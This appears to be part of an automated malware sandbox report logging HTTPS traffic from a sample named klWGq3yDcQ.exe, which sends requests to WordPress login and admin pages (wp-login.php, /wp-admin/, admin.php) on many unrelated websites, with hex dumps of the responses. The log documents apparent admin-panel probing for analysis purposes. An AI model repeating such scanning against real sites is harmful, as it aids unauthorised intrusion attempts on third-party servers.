                                                                                                                                                                                                    2023-11-26 06:00:00 UTC581INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 36 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 36 32 33 38 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 78 2d 70 6f 77 65 72 65 64 2d 62 79 3a 20 57 50 20 45 6e 67 69 6e 65 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Sun, 26 Nov 2023 06:00:00 GMTContent-Type: text/html; charset=UTF-8Content-Length: 6238Connection: closeVary: Accept-EncodingVary: Accept-EncodingVary: Accept-Encodingx-powered-by: WP EngineSet-Cookie:
                                                                                                                                                                                                    2023-11-26 06:00:00 UTC6238INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 4c 6f 67 20 49 6e 20 26 6c 73 61 71 75 6f 3b 20 54 49 53 20 4f 66 66 72 6f 61 64 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Log In &lsaquo; TIS Offroad &#8212; WordPress</title><meta name='robots' content='noindex, follow' /><script type='text/javascri


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    571192.168.2.45641154.233.137.1244436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 06:00:00 UTC162OUTGET / HTTP/1.1
                                                                                                                                                                                                    Host: www.rech.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 06:00:01 UTC621INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 36 3a 30 30 3a 30 31 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 61 6e 67 75 61 67 65 3a 20 70 74 2d 42 52 0d 0a 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 66 72 61 6d 65 2d 61 6e 63 65 73 74 6f 72 73 20 27 73 65 6c 66 27 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6f 72 69 67 69 6e 44 69 72 65 63 74 3d 74 72 75 65 3b 20 4d 61 78 2d 41 67 65 3d 36 30
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKDate: Sun, 26 Nov 2023 06:00:01 GMTContent-Type: text/html;charset=UTF-8Transfer-Encoding: chunkedConnection: closeContent-Language: pt-BRContent-Security-Policy: frame-ancestors 'self'Set-Cookie: originDirect=true; Max-Age=60
                                                                                                                                                                                                    2023-11-26 06:00:01 UTC15763INData Raw: 37 64 38 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 20 5d 3e 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 74 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 20 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 74 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 20 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 74 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 39 20 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70
                                                                                                                                                                                                    Data Ascii: 7d88<!DOCTYPE html>...[if lt IE 7 ]> <html lang="pt" class="no-js ie6"> <![endif]-->...[if IE 7 ]> <html lang="pt" class="no-js ie7"> <![endif]-->...[if IE 8 ]> <html lang="pt" class="no-js ie8"> <![endif]-->...[if IE 9 ]> <html lang="p
                                                                                                                                                                                                    2023-11-26 06:00:01 UTC16381INData Raw: 6f 6e 63 6c 69 63 6b 3d 22 73 65 6e 64 4b 69 6e 65 73 69 73 44 61 74 61 41 6a 61 78 28 7b 61 63 74 69 6f 6e 49 44 3a 20 27 63 6c 69 63 6b 27 2c 61 63 74 69 6f 6e 44 61 74 61 3a 60 61 64 65 73 69 76 6f 73 2d 64 65 63 61 6c 71 75 65 73 20 2d 20 63 61 74 65 67 6f 72 79 32 60 7d 29 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 41 64 65 73 69 76 6f 73 20 26 61 6d 70 3b 20 44 65 63 61 6c 71 75 65 73 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 73 75 62 2d 6d 65 6e 75 2d 69 74 65 6d 2d 6c 69 6e 6b 22 0a 09 09 09
                                                                                                                                                                                                    Data Ascii: onclick="sendKinesisDataAjax({actionID: 'click',actionData:`adesivos-decalques - category2`})">Adesivos &amp; Decalques</a><a class="sub-menu-item-link"
                                                                                                                                                                                                    2023-11-26 06:00:01 UTC16384INData Raw: 37 66 65 30 0d 0a 74 65 72 2d 73 65 6c 65 63 74 20 79 2d 79 65 61 72 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 4e c3 ba 6d 65 72 6f 20 64 65 20 53 c3 a9 72 69 65 22 2f 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 66 69 6c 74 65 72 2d 62 75 74 74 6f 6e 20 62 74 6e 20 62 74 6e 2d 6c 67 20 6e 6f 2d 72 61 64 69 75 73 22 3e 46 69 6c 74 72 61 72 3c 2f 62 75 74 74 6f 6e 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 3c 2f 6e 61 76 3e 0a 09 09 09 0a 09 09 0a 09 0a 3c 73 63 72 69 70 74 3e 0a 09 76 61 72 20
                                                                                                                                                                                                    Data Ascii: 7fe0ter-select y-year" placeholder="Nmero de Srie"/><button type="submit" class="filter-button btn btn-lg no-radius">Filtrar</button></div></div></div></div></div></nav><script>var
                                                                                                                                                                                                    2023-11-26 06:00:01 UTC16360INData Raw: 09 09 09 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 2d 73 65 63 6f 6e 64 61 72 79 2d 62 6f 78 2d 74 77 6f 22 20 3e 0a 09 09 09 09 0a 09 09 09 09 09 0a 09 09 09 09 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 2d 73 65 63 6f 6e 64 61 72 79 2d 62 6f 78 2d 74 68 72 65 65 22 3e 0a 09 09 09 09 0a 09 09 09 09 09 0a 09 09 09 09 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 64 69 76 20 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 2d 73 65 63 6f 6e 64 61 72 79 2d 62 6f 78 2d 66 6f 75 72 22 3e 0a 09 09 09 09 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6f 6f 74 65 72 5f 5f 6c 6f 67 6f 22 3e 0a 09 09 09 09 09 09 3c 61 20 68 72 65
                                                                                                                                                                                                    Data Ascii: </div><div class="container-secondary-box-two" ></div><div class="container-secondary-box-three"></div><div class="container-secondary-box-four"><div class="footer__logo"><a hre
                                                                                                                                                                                                    2023-11-26 06:00:01 UTC16384INData Raw: 37 66 65 30 0d 0a 0a 0a 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 69 64 3d 22 63 6f 75 6e 74 64 6f 77 6e 2d 74 65 6d 70 6c 61 74 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 78 2d 68 61 6e 64 6c 65 62 61 72 73 2d 74 65 6d 70 6c 61 74 65 22 3e 0a 09 09 7b 7b 23 69 66 20 73 6b 75 2e 62 65 73 74 7d 7d 0a 09 3c 64 69 76 20 69 74 65 6d 70 72 6f 70 3d 22 6f 66 66 65 72 73 22 20 69 74 65 6d 73 63 6f 70 65 3d 22 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 4f 66 66 65 72 22 20 63 6c 61 73 73 3d 22 63 6f 75 6e 74 64 6f 77 6e 2d 6f 66 66 65 72 22 3e 0a 09 09 3c 6c 69 6e 6b 20 69 74 65 6d 70 72 6f 70 3d 22 75 72 6c 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 72 65 63 68 2e 63 6f 6d 2f 22 2f 3e
                                                                                                                                                                                                    Data Ascii: 7fe0</script><script id="countdown-template" type="text/x-handlebars-template">{{#if sku.best}}<div itemprop="offers" itemscope="" itemtype="http://schema.org/Offer" class="countdown-offer"><link itemprop="url" href="https://www.rech.com/"/>
                                                                                                                                                                                                    2023-11-26 06:00:01 UTC16360INData Raw: 09 64 61 74 61 2d 6f 72 69 67 69 6e 70 72 69 63 65 3d 22 7b 7b 73 6b 75 2e 62 65 73 74 2e 6f 72 69 67 69 6e 50 72 69 63 65 7d 7d 22 0a 09 09 09 09 09 09 64 61 74 61 2d 73 65 6c 6c 65 72 3d 22 7b 7b 73 6b 75 2e 62 65 73 74 2e 73 65 6c 6c 65 72 4e 61 6d 65 7d 7d 22 0a 09 09 09 09 09 09 64 61 74 61 2d 69 64 3d 22 7b 7b 73 6b 75 2e 73 6b 75 49 64 7d 7d 22 0a 09 09 09 09 09 09 64 61 74 61 2d 73 6b 75 2d 6f 62 6a 3d 22 22 0a 09 09 09 09 09 09 64 61 74 61 2d 70 61 72 74 6e 65 72 53 74 6f 63 6b 73 3d 22 7b 7b 73 6b 75 2e 70 61 72 74 6e 65 72 53 74 6f 63 6b 73 7d 7d 22 0a 09 09 09 09 09 09 64 61 74 61 2d 73 74 6f 63 6b 2d 72 65 6d 61 69 6e 69 6e 67 3d 22 7b 7b 73 6b 75 2e 62 65 73 74 2e 73 74 6f 63 6b 52 65 6d 61 69 6e 69 6e 67 7d 7d 22 0a 09 09 09 09 09 09 64 61
                                                                                                                                                                                                    Data Ascii: data-originprice="{{sku.best.originPrice}}"data-seller="{{sku.best.sellerName}}"data-id="{{sku.skuId}}"data-sku-obj=""data-partnerStocks="{{sku.partnerStocks}}"data-stock-remaining="{{sku.best.stockRemaining}}"da
                                                                                                                                                                                                    2023-11-26 06:00:01 UTC3475INData Raw: 64 38 63 0d 0a 6e 64 61 72 79 3a 20 27 23 34 66 34 66 34 66 27 2c 0a 09 09 63 6f 6c 6f 72 54 65 72 74 69 61 72 79 3a 20 27 23 34 66 34 66 34 66 27 2c 0a 09 09 63 6f 6c 6f 72 51 75 61 74 65 72 6e 61 72 79 3a 20 27 23 32 36 37 37 46 39 27 2c 0a 09 09 63 6f 6c 6f 72 4e 65 75 74 72 61 6c 3a 20 22 23 42 36 42 36 42 36 22 2c 0a 09 09 63 6f 6c 6f 72 45 72 72 6f 72 3a 20 22 23 45 41 30 38 30 38 22 2c 0a 09 09 63 6f 6c 6f 72 41 6c 65 72 74 3a 20 22 23 45 31 41 31 30 30 22 2c 0a 09 09 63 6f 6c 6f 72 53 75 63 63 65 73 73 3a 20 22 23 30 37 42 34 35 44 22 0a 09 7d 0a 0a 09 77 69 6e 64 6f 77 2e 63 77 73 54 68 65 6d 65 54 6f 6b 65 6e 73 28 74 6f 6b 65 6e 73 29 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 0a 09 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a
                                                                                                                                                                                                    Data Ascii: d8cndary: '#4f4f4f',colorTertiary: '#4f4f4f',colorQuaternary: '#2677F9',colorNeutral: "#B6B6B6",colorError: "#EA0808",colorAlert: "#E1A100",colorSuccess: "#07B45D"}window.cwsThemeTokens(tokens)</script><script type="text/j
                                                                                                                                                                                                    2023-11-26 06:00:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    572192.168.2.45642118.229.0.1714436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 06:00:00 UTC158OUTGET / HTTP/1.1
                                                                                                                                                                                                    Host: rech.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 06:00:01 UTC184INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 36 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 72 65 63 68 2e 63 6f 6d 2f 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 301 Moved PermanentlyServer: nginxDate: Sun, 26 Nov 2023 06:00:00 GMTContent-Type: text/htmlContent-Length: 162Connection: closeLocation: https://www.rech.com/
                                                                                                                                                                                                    2023-11-26 06:00:01 UTC162INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    573192.168.2.456435213.0.13.444436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 06:00:00 UTC184OUTGET /wp/wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: www.ceuandalucia.es
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 06:00:01 UTC542INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 36 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 79 3a 20 50 48 50 2f 35 2e 34 2e 34 35 2d 30 2b 64 65 62 37 75 31 34 0d 0a 45 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 77 6f 72 64 70 72 65 73 73 5f 74 65 73 74 5f 63 6f 6f 6b 69 65 3d 57 50 2b 43 6f 6f 6b 69 65 2b 63 68 65 63 6b 3b 20 70 61 74 68 3d
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKDate: Sun, 26 Nov 2023 06:00:00 GMTServer: ApacheX-Powered-By: PHP/5.4.45-0+deb7u14Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=
                                                                                                                                                                                                    2023-11-26 06:00:01 UTC6439INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 0a 09 09 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 63 6c 61 73 73 3d 22 69 65 38 22 20 6c 61 6e 67 3d 22 65 73 22 20 78 6d 6c 6e 73 3a 6f 67 3d 22 68 74 74 70 3a 2f 2f 6f 70 65 6e 67 72 61 70 68 70 72 6f 74 6f 63 6f 6c 2e 6f 72 67 2f 73 63 68 65 6d 61 2f 22 20 78 6d 6c 6e 73 3a 66 62 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 32 30 30 38 2f 66 62 6d 6c 22 3e 0a 09 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 09 3c 21 2d 2d 5b 69 66 20 21 28 49 45 20 38 29 20 5d 3e 3c 21 2d 2d 3e 0a 09 09 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html>...[if IE 8]><html xmlns="http://www.w3.org/1999/xhtml" class="ie8" lang="es" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"><![endif]-->...[if !(IE 8) ]>...><html xmlns="http://w


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    574192.168.2.45645366.235.200.1474436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 06:00:00 UTC262OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                    Host: tradeavenida.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: _cfuvid=hY8Vy7VtT12kDq0RfaLK5NeJRfcW.qBPudtlDQAWA4k-1700978399347-0-604800000
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 06:00:01 UTC553INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 32 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 36 3a 30 30 3a 30 31 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 45 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 58 2d 52 65 64 69 72 65 63 74 2d 42 79 3a 20 57 6f 72
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 302 FoundDate: Sun, 26 Nov 2023 06:00:01 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0X-Redirect-By: Wor
                                                                                                                                                                                                    2023-11-26 06:00:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    575192.168.2.45645474.220.219.1894436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 06:00:00 UTC175OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                    Host: himontessori.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 06:00:01 UTC456INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 32 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 36 3a 30 30 3a 30 31 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 45 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 58 2d 52 65 64 69 72 65 63 74 2d 42 79 3a 20 57 6f 72 64 50 72 65 73 73 0d 0a 55 70 67 72 61 64 65 3a 20 68 32 2c 68 32 63 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 55 70 67 72 61 64 65 2c 20 63 6c 6f 73 65 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 302 FoundDate: Sun, 26 Nov 2023 06:00:01 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0X-Redirect-By: WordPressUpgrade: h2,h2cConnection: Upgrade, closeLocation: https://


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    576192.168.2.4564513.111.240.64436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 06:00:01 UTC172OUTGET /admin.php HTTP/1.1
                                                                                                                                                                                                    Host: www.knu.ac.in
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 06:00:01 UTC1099INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 36 3a 30 30 3a 30 31 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 70 72 69 76 61 74 65 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 58 53 52 46 2d 54 4f 4b 45 4e 3d 65 79 4a 70 64 69 49 36 49 6d 74 44 53 32 46 69 5a 30 64 57 4d 6a 42 31 54 6b 64 52 4b 33 42 6a 56 6b 49 78 5a 6b 45 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 57 48 46 57 4e 57 52 71 53 6b 78 6a 52 79 74 56 4f 54 52 6a 55 57 52 54 4d 32 5a 32 5a 58 64 35 54 6c 59 32 64 7a 51 34 4e 55 34 76 55 6b 6f 76 4d 6e 4a 32 54 6d 35 30 65 6d 39 68 54 58 67 30 61 33 6f 30 63 57 6c 73
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKDate: Sun, 26 Nov 2023 06:00:01 GMTServer: ApacheCache-Control: no-cache, privateSet-Cookie: XSRF-TOKEN=eyJpdiI6ImtDS2FiZ0dWMjB1TkdRK3BjVkIxZkE9PSIsInZhbHVlIjoiWHFWNWRqSkxjRytVOTRjUWRTM2Z2ZXd5TlY2dzQ4NU4vUkovMnJ2Tm50em9hTXg0a3o0cWls


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    577192.168.2.45653745.40.150.544436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
